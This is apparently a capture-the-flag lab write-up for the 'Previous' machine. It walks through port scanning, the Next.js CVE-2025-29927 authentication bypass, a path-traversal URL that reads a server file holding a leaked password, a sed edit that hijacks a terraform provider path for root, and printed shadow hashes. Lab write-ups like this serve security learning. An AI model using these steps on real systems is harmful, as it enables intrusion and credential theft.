Basic information

Port scan

Ports 22 and 80 are open:

$ nmap -sC -sV -Pn 10.10.11.83
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-30 12:57 JST
Nmap scan report for 10.10.11.83
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://previous.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.08 seconds

80

A hosts entry is needed:

10.10.11.83 previous.htb

The site is the PreviousJS homepage; the response headers show it runs on Next.js:

docs

There is a docs section, but it requires authentication to view:

CVE-2025-29927

A search turns up the Next.js authentication bypass vulnerability:

docs

After bypassing authentication, the docs can be viewed:

Configuring Burp to add the header automatically makes browsing easier:

download

In the examples section there is a download endpoint:

Basic LFI (path traversal):

next-auth

Reading the next-auth file from its default path yields the password for the user jeremy:

http://previous.htb/api/download?example=../../../../proc/self/cwd/.next/server/pages/api/auth/%5B...nextauth%5D.js

e?.username==="jeremy"&&e.password===(process.env.ADMIN_SECRET??"MyNameIsJeremyAndILovePancakes"

user flag

Log in over SSH with the obtained username and password:

Privilege escalation information

sudo allows running terraform apply in a specific directory; looking at the configuration file reveals where the provider file comes from:

So we can replace the path in the configuration file and have our own program executed instead.

Privilege escalation & root flag

Prepare a malicious program, modify the configuration file, and run it:

sed -i 's/\/usr\/local\/go\/bin/\/tmp\/miao/' /home/jeremy/.terraformrc

shadow

root:$y$j9T$8eJygIdCzBjq.MydZo1XO0$2l7w4GXSdYpIEuvzgPad7Tm2YK6/7L.mTU.CiLfaPf8:20321:0:99999:7:::
jeremy:$y$j9T$.12cctgaWMDR8r3JYiB5q0$xAiP7hRx8A8br/fd2HPW8Ctu8XumwSCAsH4v9XUxdb4:20321:0:99999:7:::

References